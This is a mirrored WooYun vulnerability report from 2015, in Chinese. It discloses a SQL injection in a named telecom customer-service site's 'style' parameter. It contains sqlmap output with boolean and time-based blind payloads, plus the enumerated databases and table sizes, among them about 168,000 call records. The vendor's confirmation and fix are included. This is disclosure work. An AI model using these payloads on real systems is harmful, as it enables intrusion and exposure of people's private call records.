乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-31: 细节已通知厂商并且等待厂商处理中 2015-02-01: 厂商已经确认,细节仅向厂商公开 2015-02-11: 细节向核心白帽子及相关领域专家公开 2015-02-21: 细节向普通白帽子公开 2015-03-03: 细节向实习白帽子公开 2015-03-17: 细节向公众公开
SQL注入点:
http://tel6.53kf.com/external.php?controller=web&style=70816065-4000290058-103764652
Parameter: style (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=web&style=70816065-4000290058-103764652' AND 8287=8287 AND 'hqzY'='hqzY Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: controller=web&style=70816065-4000290058-103764652' AND SLEEP(5) AND 'qiEU'='qiEU---back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: style (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=web&style=70816065-4000290058-103764652' AND 8287=8287 AND 'hqzY'='hqzY Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: controller=web&style=70816065-4000290058-103764652' AND SLEEP(5) AND 'qiEU'='qiEU---back-end DBMS: MySQL 5.0.11current user: '[email protected].%'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
back-end DBMS: MySQL 5.0.11available databases [4]:[*] information_schema[*] ip[*] tel[*] test
Database: tel+-----------------+---------+| Table | Entries |+-----------------+---------+| tel_role | 416833 | 角色| tel_callrecord | 168551 | 通话记录| tel_log | 37405 | | tel_calltask | 16182 | | tel_sendmsg | 5173 || tel_seat | 2711 || tel_config | 1758 || tel_blacklist | 1086 || tel_recharge | 1078 || tel_number | 711 || tel_style | 664 || tel_queue | 489 || tel_seat_period | 191 |+-----------------+---------+
该注入可能导致泄露16万通话记录,此处仅select出一条作为危害证明,抽选第一条看看:
我们看看这一条可以得知是一些通话记录,包括主叫、被叫号码、主叫城市、被叫城市、通话时长等等等~~
好了,此次测试未带走任何数据,好好修复漏洞吧!
要过年了,就当发红包一样多给一些Rank吧~
危害等级:高
漏洞Rank:14
确认时间:2015-02-01 20:46
感谢对于问题的反馈,我们已经紧急对问题进行了修复,谢谢
暂无